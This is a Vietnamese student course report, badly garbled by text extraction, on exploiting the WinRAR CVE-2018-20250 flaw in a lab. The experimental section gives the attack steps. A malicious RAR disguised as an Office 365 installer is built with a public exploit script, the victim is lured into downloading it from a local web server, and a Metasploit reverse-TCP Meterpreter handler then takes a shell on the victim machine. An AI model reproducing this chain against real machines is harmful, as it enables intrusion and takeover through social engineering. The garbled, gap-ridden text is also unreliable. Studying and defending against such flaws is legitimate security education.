TRƯỜNG ĐẠI HỌC THỦ DẦU MỘT VIỆN KỸ THUẬT - CƠNG NGHỆ ĐỒ ÁN MƠN HỌC AN TỒN VÀ BẢO MẬT THÔNG TIN ĐỀ TÀI: EXPLOIT WINRAR CVE-2018-20250 GVHD: ThS Lê Từ Minh Trí SVTH - Nhóm 3: Hồ Sỹ Gia Trung - 2024801030101 Vũ Chân Thật - 2124801030210 Bình Dương, 06/2022 h MỤC LỤC MỤC LỤC LỜI NÓI ĐẦU .2 CHƯƠNG 1: TỔNG QUAN 1.1 Tổ ng quan v ề v ấn đề ng hiên cứu: 1.2 Nhiệm vụ đồ án: .3 CHƯƠNG 2: CƠ SỞ LÝ THUYẾT 2.1 An tồn thơ ng tin c Việt Nam hi ệ n nay: 2.2 Khái ni ệm v ề bảo mật: 2.2.1 An tồn thơng tin: 2.2.2 Khái ni ệm lỗ hổng bảo mật: 2.2.3 Giới thi ệu h ệ điều hành Windows 10: 2.3 Các l ỗ hổng bảo mật Wi ndows 10: 2.4 Giới thi ệu hệ điều hành Kali Linux: 2.4.1 Hệ điều hành Kali Linux: .8 2.4.2 Các công c ụ bảo mật Kali Linux 2.5 Giới thi ệu phần mềm giải nén Winrar & CVE-2018-20250: 10 CHƯƠNG 3: KẾT QU Ả THỰ C NGHI ỆM 12 3.1 Công c ụ t ấn công Metasploit: 12 3.2 Mộ t s ố k ỹ thuật công: 13 3.3 Demo khai thác l ỗ hổng: 13 3.3.1 Chu ẩ n b ị ba máy: 13 3.3.2 Các bước ti ến hành sau: 14 3.4 Cách phòng chống: 22 3.5 Các ng uyên nhân gây m ất thông tin: 22 3.6 Hậ u việc mấ t an tồn thơng tin: 23 3.7 Mộ t s ố giải pháp: 23 TÀI LI Ệ U THAM KH ẢO 24 h LỜI NĨI ĐẦU Bảo mật thơng tin luôn vấn đề đặt lên hàng đầu v ới th ời đạ i 4.0 hi ện Các trang mạng hệ điều hành miếng mồi ngon cho hacker xâm nhập để đánh cắp thông tin c khách hàng Chúng s d ụ ng l ỗ hổng h ệ điều hành để xâm nhập bất h ợp pháp vào máy tính c b ạn cài vào số phần mềm ho ặc chiếm ln quyền điều hành c máy tính bạn nhằm phá ho ại đánh cắp thông tin bảo mật máy tinh cá nhân b ạn Nhằm phịng tránh việc ăn cắp thơng tin chun gia bảo mật phát minh hệ điều hành Kali Linux Kali Linux sử dụng máy ảo để thực hành ki ểm tra b ảo mật nhằm đánh giá an toàn hệ thống với hàng trăm công cụ bảo mật thâm nh ập t ốt Kali Linux ph ấn phối phát triển b ởi Offensive Security tổ chức phát hành vào tháng năm 2013, thay th ế cho hệ điều hành Backtrack Kali Linux xem biện pháp ti ện l ợi, tất c ả có Kali Linux chu ẩn bị phân loại, thu th ập c ập nhật công c ụ h ệ điều hành Kali Linux công việc ch ỉ việc đặt mục tiêu ki ểm tra h ệ thống WinRAR ph ần mềm nén tập tin d ữ liệu Yevgeny Roshal phát tri ển c win.rar GmbH, b ản đầ u tiên mắt vào mùa thu năm 1993 Đây phầ n mềm thương mại WinRAR có th ể tạo xem lưu trữ định dạng tệp RAR ho ặc ZIP, gi ải nén nhiều định d ạng t ệp lưu trữ Để cho phép người dùng kiểm tra tính tồn v ẹn c lưu trữ, WinRAR nhúng CRC32 ho ặc BLAKE2 checksums cho t ệp tệp lưu trữ WinRAR h ỗ trợ tạo lưu trữ mã hóa, đa phần tự giải nén WinRAR ứng d ụ ng ch ỉ dành cho Windows Tác gi ả phát hành ứng d ụng Android có tên "RAR dành cho Androi d" Với mục tiêu tìm hi ểu khai thác l ỗ h ứng d ụng Winrar h ệ điều hành Windows 10 đồ ng th ời để h ọ c tập thêm kinh nghi ệm nghiên c ứu v ề h ệ điều hành nên nhóm em chọn đề tài để thực h CHƯƠNG 1: TỔNG QUAN 1.1 Tổng quan v ề v ấn đề nghiên c ứu: - Nghiên c ứu v ề cách s d ụng ứng n ền tảng cơng ngh ệ thơng tin để tìm thông tin b ảo mật, cách qu ản lý, khai thác h ệ thống Windows 10 - Nghiên cứu h ệ điều hành Kali Linux - Nghiên cứu ph ần mềm Winrar (version shell.exe - Bước 4: Tạo file Office365Setup.rar 15 h + Dùng máy th ật mở Command Prompt (cmd) Lệnh: git clone https://github.com/giatrung2012/CVE- 2018-20250 + Kéo file shell.exe t máy Kali Linux sang máy th ật + Di chuy ển vào folder CVE- 2018-20250 compile file exp.py Lệnh: cd CVE- 2018-20250 py exp.py 16 h - Bước 5: Lừa victim t ải file Office365Setup.rar + Kéo file Office365Setup.rar t máy th ật sang Desktop c Kali Linux + Di chuy ển vào folder Desktop r ồi Lệnh: cd Desktop/ python3 -m http.server (do trình độ cịn giới h ạn nên nhóm em dùng cách này) + Mở Chrome máy Windows 10, truy c ập 10.0.0.199:8000 & download file Office365Setup.rar: 17 h - Bước 6: Dùng Metasploit để t ấn công Lệnh: msfconsole Lệnh: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lport 1234 set lhost 10.0.0.199 exploit -j 18 h + Sau user máy Windows 10 gi ải nén file Office365Setup.rar folder C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ xuất file hi.exe (mã độc) + Trong Task Manager xu ất hi ện ApacheBench command line utility (hi.exe) Khi user restart PC mã độc s ẽ tự độ ng kích ho ạt 19 h Lệnh: sessions sessions sysinfo (Kiểm tra thông tin máy victim) shell 20 h + Tới bước coi ta thành công truy cập vào máy victim, gi th mở phần mềm Calculator t Kali Linux Thành qu ả: 21 h 3.4 Cách phòng chống: Cách phòng ch ố ng hiệu phải thường xuyên cập nhật phiên b ản Winrar nh ất 3.5 Các nguyên nhân gây m ấ t thông tin: - Nhận th ức: Nguyên nhân có l ẽ nguyên nhân dẫn tới cố ATTT tăng cao Thậm chí s ố trường h ợp, Hacker không c ần dùng t ới công c ụ hay ph ần mềm t ấn công nạn nhân v ẫn b ị lừa đảo - Không phân quy ền rõ ràng: M ột nh ững nguyên nhân làm m ất thơng tin d ữ liệu người quản trị không phân quy ền rõ ràng cho thành viên L ợi d ụng điều này, nhân viên n ộ i b ộ có th ể đánh cắp, tráo đổi, thay đổi thông tin c công ty - Lỗ hổng tồn thiết bị: Th ực tế r ằng, nhiều người dùng tải cài đặt phần mềm mới, ứng d ụ ng cho điệ n tho ại, laptop, PC… mà không tự hỏi r ằng “Liệ u phần mềm có ch ứa lỗ h hay khơng” Trong đó, phần mềm ứng dụng tồn nh ững l ỗ h b ảo mật nguy công - Lỗ h h ệ thố ng: Hệ thố ng có th ể h ệ thống website, h ệ thống mạng, h ệ thống ứng d ụng, thi ết b ị, ph ần mềm Nguyên nhân làm an tồn thơng tin trường h ợp đơn vị không thường xuyên rà quét l ỗ h ổng, đánh giá bảo mật cho h ệ thống d ẫn t ới nh ững nguy thiệt hại v ề tài to l ớn 22 h 3.6 Hậu việc an tồn thơng tin: - Ngoài s ố thi ệt h ại an tồn thơng tin SecurityBox v ừa điể m trên, doanh nghiệp cịn b ị thi ệt hại to lớn v ề tài có c ố Mặt khác, thương hiệu cơng ty có th ể b ị ảnh hưởng, làm lòng tin v ới khách hàng Điển ngành ngân hàng, tài thương mại điện tử, thơng tin c khách hàng b ị lộ lọ t tin t ặc s ẽ l ợi d ụng khai thác tri ệt để có th ể 3.7 Một s ố giải pháp: - Cập nh ật ph ần mềm: Một nh ững gi ải pháp tránh thông tin hi ệu cài đặt phần mềm Bạn cài phần mềm diệt virus, ph ần mềm c ảnh báo t ấn công, phần mềm giám sát h ệ thống - Cài đặ t ph ần mềm di ệt virus: Cài đặt phần mềm ch ống virus xâm nh ập giải pháp chuyên gia khuyến cáo Lưu ý, người dùng nên quét virus trước tải phần mềm v ề máy Một s ố công c ụ online giúp ki ểm tra mã độc online như: virus total, 6scan security, sitecheck - Kiểm soát quy ền thi ết b ị: Hãy phân chia quy ền th ật rõ ràng cho thành viên, người thân thi ết b ị c b ạn - Tắt kết nối Wifi, Bluetooth, NFC không s dụng: Hãy nh sau vào mạng, bạn ph ải t kết nối Wifi, bluetooth, NFC để tránh nguy bị rị rỉ mật khẩu, tài liệu thơng tin cá nhân 23 h TÀI LIỆU THAM KHẢO - Demo khai thác l ỗ h WinRAR CVE- 2018-20250: https://j2c.cc/3965e5f6 - Top ph ần mềm nén file tốt nh ất hi ện – VnMedia : https://j2c.cc/aa40a543 - WinRAR – Wikipedia ti ếng Việt: https://vi.wikipedia.org/wiki/WinRAR 24 h h h h h